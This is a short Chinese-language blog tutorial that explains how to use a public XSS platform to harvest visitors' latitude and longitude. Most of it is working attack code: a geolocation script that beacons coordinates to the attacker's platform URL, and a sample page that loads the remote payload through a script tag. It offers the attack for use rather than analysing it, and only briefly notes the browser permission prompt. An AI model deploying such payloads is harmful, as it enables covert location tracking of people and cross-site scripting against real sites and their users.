利用开源XSS平台获取经纬度位置信息

时间:2024-03-29 14:55:32

1、利用的平台:http://xss.asgsec.cn/index.php
直接注册,登录即可。

2、创建自己的项目,随便取个名字。
利用开源XSS平台获取经纬度位置信息

3、创建模块,这里创建一个获取经纬度功能的模块。
利用开源XSS平台获取经纬度位置信息
4、具体代码内容:

function getLocation() //获取GPS定位方法
  {
  if (navigator.geolocation)
    {
    navigator.geolocation.getCurrentPosition(showPosition);
    }
  else{x.innerHTML="Geolocation is not supported by this browser.";}
  }
function showPosition(position)
  {
//alert("Latitude: " + position.coords.latitude + "Longitude: " + position.coords.longitude); //测试,注释掉
    (new Image()).src='http://xss.asgsec.cn/index.php?do=api&id={projectId}&weidu='+position.coords.latitude+'&jingdu='+position.coords.longitude; //向XSS平台发送经纬度信息
}
       
getLocation();

5、注意将步骤4中的地址修改为自己项目对应地址。点击项目——查看代码,可以看到对应payload。
x在这里插入图片描述利用开源XSS平台获取经纬度位置信息6、新建一个html页面,注入步骤5 的代码

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
</head>

<body>
<p id="demo">这是测试页面</p>
<script src=http://xss.asgsec.cn/R9EZsB?1542357221></script>
</html>

利用开源XSS平台获取经纬度位置信息7、然后用浏览器打开该页面访问,回到xss平台刷新,即可看到获取的数据。

Ps:该方法获取位置信息时,会受限于浏览器,而且浏览器会弹窗“是否允许获取位置信息”,所以应用条件苛刻。